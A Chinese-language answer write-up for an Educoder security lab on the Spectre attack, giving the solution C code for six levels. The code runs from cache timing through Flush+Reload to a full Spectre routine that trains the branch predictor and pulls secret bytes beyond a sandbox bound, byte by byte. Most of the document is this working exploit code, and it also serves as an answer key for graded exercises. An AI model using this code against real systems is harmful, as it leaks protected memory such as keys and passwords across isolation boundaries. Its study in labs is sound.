头歌-信息安全技术-Spectre侧信道攻击过程验证

• 一、第1关：Cache vs Memory
• • 1、编程要求
  • 2、评测代码
• 二、第2关：基于Flush+Reload的侧信道实现
• • 1、编程要求
  • 2、评测代码
• 三、第3关：Spectre预测执行
• • 1、编程要求
  • 2、评测代码
• 四、第4关：Spectre攻击简单实验
• • 1、编程要求
  • 2、评测代码
• 五、第5关：Spectre攻击实验改进
• • 1、编程要求
  • 2、评测代码
• 六、第6关：Spectre攻击窃取敏感信息实战
• • 1、编程要求
  • 2、评测代码

一、第1关：Cache vs Memory

1、编程要求

根据提示，在右侧编辑器完善代码，完成数据初始化、缓存驱逐、缓存加载、时延测定等全部环节，输出对array[10*4096]数组中各元素的访问时延。

2、评测代码

  for(i=0; i<10; i++) _mm_clflush(&array[i*4096]);

二、第2关：基于Flush+Reload的侧信道实现

1、编程要求

根据提示，在右侧编辑器补充代码，完成基于Flush+Reload的侧信道攻击实现，按要求打印攻击结果。

2、评测代码

//该实验中，假设用户没有Secret的访问权限，不能直接读取Secret的值，可以通过测时延来获取其内容。#include 
#include 
#include 
#include 
#include FILE *fp;
uint8_t array[256*4096];
int temp;
unsigned char secret = 66;/* 请去掉下面一行的注释，并将括号中的'THRESHOLD'替换为具体门限值，该门限值可以根据上一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (250)#define DELTA 1024void victim()
{temp = array[secret*4096 + DELTA];
}void flushSideChannel()
{int i;// 初始化该数组，防止Copy-on-Write导致实验失败for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;// 驱逐缓存Cache，请在下方补充代码，将array[0*4096+DELTA]至array[255*4096+DELTA]等数据从缓存中强制驱逐/**************************************/for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 + DELTA]);/**************************************/
}void reloadSideChannel()
{int junk=0;register uint64_t time1, time2;volatile uint8_t *addr;int i;unsigned int ui;//请补全并下方代码，获得i*4096 + DELTA位置元素的访问时延，并将小于门限的访问行为判定为缓存命中，按照指定格式输出结果。/*******************/for(i = 0; i < 256; i++){  addr = &array[i*4096 + DELTA];time1 = __rdtscp(&ui);   junk = *addr;time2 = __rdtscp(&ui) - time1;if ((int)time2 <= CACHE_HIT_THRESHOLD){printf("访问array[%d*4096 + %d]元素时发生缓存命中，时延%d.\n", i, DELTA, (int)time2);printf("秘密值Secret = %d（字符：\'%c\'）。\n", i, i);fprintf(fp,"秘密值Secret = %d（字符：\'%c\'）。\n" ,i, i); //不要修改本行代码}} /******************/ }int main(int argc, const char **argv)
{fp=fopen("Spectre-Attack/ans/T2/result.txt","w");flushSideChannel();victim();reloadSideChannel();fclose(fp);return (0);
}

三、第3关：Spectre预测执行

1、编程要求

根据提示，在右侧编辑器补充代码，完成对CPU分支预测的训练、边界外数据（即索引大于size的数组元素）向高速缓存的加载，并利用FLUSH+RELOAD侧信道来验证目标数据是否已加载。
考虑到利用Sepctre漏洞时，因为系统噪声（即其他系统进程对CPU的占用、对缓存的占用等）的影响，某些时候分支的预测不会按照我们的期望执行，因此，本任务中将重复10次实验，查看缓存命中结果。

2、评测代码

/* 请去掉下面一行的注释，并将括号中的'THRESHOLD'替换为具体门限值，该门限值可以根据第一关中测得的缓存命中时延设定*/#define CACHE_HIT_THRESHOLD (300)

    // 请补全下方代码并取消注释，①将victim()函数中分支判断需要的数据'size'从缓存中驱逐，以在后续调用中触发预测执行；②将array数组中i*4096+DELTA处的数据从缓存中驱逐，以便后续reload阶段判断目标数据是否被加载。/*******************************************/for (i = 0; i < 256; i++)_mm_clflush(&array[i* 4096 + DELTA]); /********************************************/

四、第4关：Spectre攻击简单实验

1、编程要求

根据提示，在右侧编辑器补充代码，完成CPU分支预测的训练、边界外内存数据的缓存加载，并利用高速缓存侧信道提取目标地址的敏感信息值。

2、评测代码

/* 请去掉下面一行的注释，并将括号中的'THRESHOLD'替换为具体门限值，该门限值可以根据第一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (300)

  // 补全下方代码，将上界、下界以及array的数据从缓存中驱逐。/***********************************************************/_mm_clflush(&bound_upper);_mm_clflush(&bound_lower);for (i = 0; i < 256; i++){_mm_clflush(&array[i*4096 + DELTA]); }/***********************************************************/

五、第5关：Spectre攻击实验改进

1、编程要求

根据提示，在右侧编辑器补充代码，完成准确的敏感字符提取（本关仅要求恢复处secret的第一个字符）。

2、评测代码

/* 请去掉下面一行的注释，并将括号中的'THRESHOLD'替换为具体门限值，该门限值可以根据第一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (80)

  //补全下方代码，当每次字符i被命中一次，对应的积分+1/*************************************/for (i = 0; i < 256; i++) {addr = &array[i * 4096 + DELTA];time1 = __rdtscp(&junk);junk = *addr;time2 = __rdtscp(&junk) - time1;if (time2 <= CACHE_HIT_THRESHOLD)scores[i]++; } /*************************************/

  // 补全下方代码，从scores数组中找到最大值，并将其索引值赋值给max/*************************************/for (i = 0; i < 256; i++){if(scores[max] < scores[i]) max = i;}/*************************************/

六、第6关：Spectre攻击窃取敏感信息实战

1、编程要求

根据提示，在右侧编辑器补充代码，完善各函数代码，最终输出指定格式的敏感信息窃取结果。

2、评测代码

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include "encipher.h"extern unsigned int bound_lower;
extern unsigned int bound_upper;uint8_t temp    = 0;uint8_t array[256*4096];/* 请去掉下面一行的注释，并将括号中的'THRESHOLD'替换为具体门限值，该门限值可以根据第一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (80)#define DELTA 2048
static int scores[256];
FILE *fp;void flushSideChannel()
{//补全下方代码，初始化array数组，并将所有相关数据从缓存中驱逐/*************************************/int i;for(i=0;i<256;i++){array[i*4096+DELTA]=1;}for(i=0;i<256;i++){_mm_clflush(&array[i*4096+DELTA]);}/*************************************/
}void reloadSideChannelImproved()
{//补全下方代码，完成高速缓存侧信道的Reload步骤，根据缓存命中情况，更新score数组/*************************************/int i;volatile uint8_t *addr;register uint64_t time1, time2;int junk = 0;for (i = 0; i < 256; i++) {addr = &array[i * 4096 + DELTA];time1 = __rdtscp(&junk);junk = *addr;time2 = __rdtscp(&junk) - time1;if (time2 <= CACHE_HIT_THRESHOLD){scores[i]++; }} /*************************************/
}void spectreAttack(size_t index_beyond)
{//补全下方代码，针对指定的内存位置，开展Spectre攻击，包括缓存清空、CPU训练、缓存驱逐、预测执行和缓存加载等环节/*************************************/int i;uint8_t s;volatile int z;for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }// 训练CPU，使其在攻击时进入期望的预测分支.for (i = 0; i < 10; i++) {get_info_sand_box(i);}// 将上界、下界以及array的数据从缓存中驱逐。_mm_clflush(&bound_upper);_mm_clflush(&bound_lower); for (i = 0; i < 256; i++){ _mm_clflush(&array[i*4096 + DELTA]); }for (z = 0; z < 100; z++)  {  }// 调用沙箱访问函数，利用预测执行漏洞访问合法内存边界之外的秘密值s = get_info_sand_box(index_beyond);if(s!=0)array[s*4096 + DELTA] += 88;/*************************************/
}int main() {//补全下方代码，针对敏感信息secret的每个字节，逐个进行提取，每个字节的提取操作执行1000次，并按照指定格式输出提取结果及其积分值（可以包括最优值与次优值，即score最大的值和第二大的值的索引）。//打印示例：printf("第%d个秘密字符的最优值 \'%c\' (ASCII: %d) 积分：[%d] ", k, (max > 31 && max < 127 ? max : '?'), max, scores[max]);/*************************************/int i;uint8_t s;fp=fopen("/home/result.txt","w");size_t index_beyond = get_addr_offset();flushSideChannel();int len = get_secret_len();int k = 0;while(--len>=0){for(i=0;i<256; i++){scores[i]=0; }for (i = 0; i < 1000; i++) {spectreAttack(index_beyond+k);usleep(10);reloadSideChannelImproved();}int max = 0; int runner_up = 0; for (i = 0; i < 256; i++){// printf("%d ", scores[i]);if(scores[max] < scores[i]) {max = i;}}for (i = 0; i < 256; i++){if(scores[runner_up] < scores[i] && i!=max) {runner_up = i;}}printf("第%d个秘密字符的最优值 '%c' (ASCII: %d) 积分：[%d] ", k, (max > 31 && max < 127 ? max : '?'), max, scores[max]);printf("次优值 '%c' (ASCII: %d) 积分：[%d]\n", (runner_up > 31 && runner_up < 127 ? runner_up : '?'), runner_up, scores[runner_up] );fprintf(fp,"%c",(max > 31 && max < 127 ? max : '?'));k++;}/*************************************/return (0); 
}